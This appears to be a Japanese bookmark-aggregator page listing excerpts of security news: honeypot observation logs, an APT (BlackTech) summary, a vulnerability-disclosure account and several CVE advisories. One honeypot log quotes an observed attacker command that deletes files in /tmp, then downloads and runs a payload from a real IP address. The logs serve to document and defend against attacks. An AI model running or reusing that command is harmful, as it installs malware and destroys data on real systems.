オープンソースを安全に保つための協力 2023年初頭、業界をリードする企業のトップ研究者たちがSCAR(Supply Chain Attack Research)グループを設立しました。攻撃者との絶え間ない競争から一歩先を行くために、グループは専門家同士の協力関係を促進し、効率的な標準を定義し、国際社会に利益をもたらすツールを開発し、共同研究と情報共有を促進する必要があることに合意しました。 Trellix Advanced Research Centerの顧客アドボカシー担当副社長であるKarine Ben-Simhonは、SCARフォーラムの創設者の一人です。シティのサイバーセキュリティイノベーションラボに勤務していた彼女は、業界横断的な活動を推進するために、SCARの設立を提案しました。 図1: コラボレーションによるサプライチェーンのセキュリティ オープンソースとパッケージ 90%
ハニーポット(仮) 観測記録 2023/09/21分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP GPONルータの脆弱性を狙うアクセス curlによるスキャン行為 .jsへのスキャン行為 .sqlへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス aiohttpによるスキャン行為 を確認しました。 Location:UK GPONルータの脆弱性を狙うアクセス curlによるスキャン行為 /.gitへの
BlackTechと呼ばれるAPTグループがあります。 このグループは防衛、政府、エレクトロニクス、通信、テクノロジー、メディア、通信業界など、複数のセクターの組織をターゲットにしていて、これまでも多くの活動が実施されていることが確認されています。 そんな活動の中に今回の動きも含まれます。 どのような動きをしているのでしょうか。 狙う組織を選択する 小さな侵害活動ではありません。 大きな侵害活動を狙い、大きな組織を選びます。 複数の国や地域に拠点を持つ組織を選びますが、特にその中でも米国や日本に本社のある組織を選びます。 足がかりを侵害する 決めたターゲットの海外子会社を攻撃します。 フィッシングを使うか、もっとソーシャルエンジニアリングに寄った方法を使うか、脆弱性を使うか、それは標的によるのかもしれません。 なんらかの手法で、ターゲットの海外子会社の内部ネットワークへのアクセスを獲得しま
会社で使っている某Webサービスを触っていたところ、気づいたのです。 このWebサービスのAPI、認証がかかってないので個人情報を取り放題だと。 正直なところ自分が開発や運用に関わっているサービスでもないので面倒くさいことに巻き込まれたくはないです。登録セキスペに重課金するのを止めた身からすれば改善の協力をする義務も無いですし。でも、放置して「実は以前から知ってました」ということがバレたら色々疑われるじゃないですか。個人だったらまだいいんですけど、会社で使っていたサービスなので放置するのもリスクが大きいと考えました。自社の情報どころか自分の個人情報が漏れる可能性もありますし。 ということで、IPA(独立行政法人情報処理推進機構)に「脆弱性関連情報の届出」をすることにしました。 この記事は、Webサービスの脆弱性を見つけたときはこういう窓口があるよという紹介になります。 IPAの脆弱性関連情
ハニーポット(仮) 観測記録 2023/09/24分です。 特徴 共通 Spring Bootの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP GPONルータの脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス aiohttpによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス curlによるスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:UK GPONル
ハニーポット(仮) 観測記録 2023/09/30分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 Location:JP TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:US Spring Bootの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 webprosbotによるスキャン行為 zgrabによるスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, worldであるアクセス
著者Jake Peterson – Lifehacker US [原文]翻訳ライフハッカー・ジャパン編集部 2023.10.01 lastupdate iOS 17がリリースされました。でも、まだアップデートしていないという人は、要注意です。iOS17がリリーズされる前、Appleは重要なセキュリティパッチをリリースして、iPhone、iPad、Mac、さらにはApple Watchの脆弱性を修正していました。 アップデートの内容とは? Appleの最新のアップデートで修正された2つのセキュリティの脆弱性があります。最初のものはImageIOの問題で、悪意のある人が悪意のある画像を送信し、任意のコードの実行につながる可能性があります。 要するに、これらの悪意のある画像のいずれかを開くと、もう一方の端末の悪意のある人物が理論的にはあなたのデバイス上で実行したいコードを実行でき、理論的にはそれ
ハニーポット(仮) 観測記録 2023/09/25分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス curlによるスキャン行為 .cssへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 107.6.255.132/jaws; sh /tmp/jaws Location:UK Spring Cloud Gatewayの脆弱性(CVE-2022-22947)
「PDF」を処理するため広く利用されているインタプリタ「Ghostscript」「GhostPDL」に脆弱性が明らかとなった。アップデートにて修正されている。 細工されたドキュメントを処理すると、IJSデバイスによってリモートよりコードを実行されるおそれがある脆弱性「CVE-2023-43115」が明らかとなったもの。 米国立標準技術研究所(NIST)の脆弱性データベース「NVD」において、共通脆弱性評価システム「CVSSv3.1」のベーススコアは「9.8」、重要度は4段階中もっとも高い「クリティカル(Critical)」とレーティングされている。 CVE番号の割り当ては9月18日に行われたが、同脆弱性については9月13日に公開された「同10.02.0」にて修正済みだという。 (Security NEXT - 2023/10/02 ) ツイート PR
JVN#39596244 医薬品医療機器等法対応医薬品等電子申請ソフトにおける XML 外部実体参照 (XXE) に関する脆弱性
株式会社フルノシステムズが提供する無線LANアクセスポイント製品(STモード利用時)には、複数の脆弱性が存在します。 CVE-2023-39222、CVE-2023-39429、CVE-2023-41086 ACERA 1210 ver.02.36およびそれ以前のファームウェアバージョン ACERA 1150i ver.01.35およびそれ以前のファームウェアバージョン ACERA 1150w ver.01.35およびそれ以前のファームウェアバージョン ACERA 1110 ver.01.76およびそれ以前のファームウェアバージョン ACERA 1020 ver.01.86およびそれ以前のファームウェアバージョン ACERA 1010 ver.01.86およびそれ以前のファームウェアバージョン ACERA 950 ver.01.60およびそれ以前のファームウェアバージョン ACERA 85
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く